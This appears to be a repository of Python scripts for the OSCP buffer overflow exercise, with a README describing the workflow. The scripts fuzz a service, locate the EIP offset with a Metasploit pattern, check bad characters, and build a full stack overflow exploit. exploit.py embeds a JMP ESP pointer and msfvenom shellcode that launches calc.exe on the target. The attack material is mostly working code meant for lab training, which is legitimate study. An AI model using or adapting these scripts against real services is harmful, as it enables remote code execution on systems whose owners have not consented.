├── README.md
├── badchars.py
├── constants.py
├── exploit.py
├── fuzz.py
└── pattern.py


/README.md:
--------------------------------------------------------------------------------
 1 | # OSCP-Buffer-Overflow
 2 | 
 3 | Python3 Scripts for OSCP buffer overflow exploitation
 4 | 
 5 | ## Usage
 6 | 
 7 | This repository is a compilation of 4 scripts used in the different steps of the OSCP buffer overflow exercise, and a little library used for storing the variables wich its value doesn't change along the exploitation. This variables are the Host IP, the Port in wich the app is running and the offset value. The library also contains a function to make the requests to the app, which is called every time we need to send any string to the server.
 8 | 
 9 | The order in wich the scripts are used is:
10 | 
11 | 1. `fuzz.py`: This script fuzzes the app in order to determine approximately how many bytes are needed for the app to crash.
12 | 2. `pattern.py`: This script make use of a file created by the user by redirecting the output of the pattern_create.rb tool. More details in the scrpit.
13 | 3. `badchars.py`: This script defines a variable in wich all characters are present. It is orientated to make the badchar check without using mona or any other tool, just the debuger.
14 | 4. `exploit.py`: This script is the one that embeeds the shellcode in the payload. Also, we ned to set the ESP JUMP. This can be done by using mona and the badchars we found(usually \x00 and \x0A are badchars).
15 | 
16 | 
17 | 


--------------------------------------------------------------------------------
/badchars.py:
--------------------------------------------------------------------------------
 1 | from constants import *
 2 | 
 3 | payload = ""
 4 | payload += "A" * offset + "BBBB"
 5 | payload += (
 6 | "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
 7 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
 8 | "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
 9 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
10 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
11 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
12 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
13 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
14 | )
15 | 
16 | send_payload(payload + "\n")


--------------------------------------------------------------------------------
/constants.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | 
 3 | host = "127.0.0.1" # Change This
 4 | port = 1234 # Change This
 5 | 
 6 | offset = 146 # Offset value. Change if neccesary
 7 | 
 8 | 
 9 | def send_payload(buffer):
10 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11 |     s.connect((host, port))
12 |     s.send(buffer)
13 |     print(s.recv(1024))
14 |     s.close()
15 | 


--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
 1 | from constants import *
 2 | 
 3 | SUB_ESP_10 = b"\x83\xec\x10"
 4 | 
 5 | # !mona jmp -r esp -cpb "\x00\x0A"
 6 | # !mona jmp -r esp -cpb "badchars"
 7 | 
 8 | ptr_jmp_esp = b"\xc3\x14\x04\x08"
 9 | 
10 | ### Def shellcode
11 | # msfvenom -p windows/exec CMD="calc.exe" -b '\x00\x0A' -f python -v shellcode EXITFUNC=thread
12 | 
13 | shellcode =  b""
14 | shellcode += b"\xdb\xca\xbe\xd3\xaf\x95\xee\xd9\x74\x24\xf4"
15 | shellcode += b"\x58\x33\xc9\xb1\x31\x31\x70\x18\x03\x70\x18"
16 | shellcode += b"\x83\xc0\xd7\x4d\x60\x12\x3f\x13\x8b\xeb\xbf"
17 | shellcode += b"\x74\x05\x0e\x8e\xb4\x71\x5a\xa0\x04\xf1\x0e"
18 | shellcode += b"\x4c\xee\x57\xbb\xc7\x82\x7f\xcc\x60\x28\xa6"
19 | shellcode += b"\xe3\x71\x01\x9a\x62\xf1\x58\xcf\x44\xc8\x92"
20 | shellcode += b"\x02\x84\x0d\xce\xef\xd4\xc6\x84\x42\xc9\x63"
21 | shellcode += b"\xd0\x5e\x62\x3f\xf4\xe6\x97\xf7\xf7\xc7\x09"
22 | shellcode += b"\x8c\xa1\xc7\xa8\x41\xda\x41\xb3\x86\xe7\x18"
23 | shellcode += b"\x48\x7c\x93\x9a\x98\x4d\x5c\x30\xe5\x62\xaf"
24 | shellcode += b"\x48\x21\x44\x50\x3f\x5b\xb7\xed\x38\x98\xca"
25 | shellcode += b"\x29\xcc\x3b\x6c\xb9\x76\xe0\x8d\x6e\xe0\x63"
26 | shellcode += b"\x81\xdb\x66\x2b\x85\xda\xab\x47\xb1\x57\x4a"
27 | shellcode += b"\x88\x30\x23\x69\x0c\x19\xf7\x10\x15\xc7\x56"
28 | shellcode += b"\x2c\x45\xa8\x07\x88\x0d\x44\x53\xa1\x4f\x02"
29 | shellcode += b"\xa2\x37\xea\x60\xa4\x47\xf5\xd4\xcd\x76\x7e"
30 | shellcode += b"\xbb\x8a\x86\x55\xf8\x75\x65\x7c\xf4\x1d\x30"
31 | shellcode += b"\x15\xb5\x43\xc3\xc3\xf9\x7d\x40\xe6\x81\x79"
32 | shellcode += b"\x58\x83\x84\xc6\xde\x7f\xf4\x57\x8b\x7f\xab"
33 | shellcode += b"\x58\x9e\xe3\x2a\xcb\x42\xca\xc9\x6b\xe0\x12"
34 | 
35 | ### Def payload
36 | 
37 | payload = b""
38 | payload += b"A"*offset
39 | payload += ptr_jmp_esp
40 | payload += SUB_ESP_10
41 | payload += shellcode
42 | 
43 | send_payload(payload + b"\n")


--------------------------------------------------------------------------------
/fuzz.py:
--------------------------------------------------------------------------------
 1 | 
 2 | from constants import *
 3 | ### Aplication fuzzer
 4 | 
 5 | payload = "A"
 6 | 
 7 | counter = 1
 8 | 
 9 | for i in range(1, 100):
10 |     print("fuzzing %s bytes" % counter)
11 |     send_payload(payload * counter + "\n")
12 |     counter = counter + 50
13 | 


--------------------------------------------------------------------------------
/pattern.py:
--------------------------------------------------------------------------------
 1 | from constants import *
 2 | 
 3 | ### Execute pattern_create.rb to generate the pattern
 4 | ## /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l Num-bytes > pattern
 5 | 
 6 | with open('pattern') as f:
 7 |     payload = f.read().strip()
 8 | 
 9 | print("Sending Patern...")
10 | 
11 | send_payload(payload + "\n")
12 | 
13 | 
14 | ## Once we've sended the pattern, we take the EIP value showed in inmunity debuger and use it to exactly now where the app crashes. Then we take that value and we store it as offset in the constants.py file.
15 | 
16 | ## /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l Num-bytes -q EIP
17 | 
18 | 


--------------------------------------------------------------------------------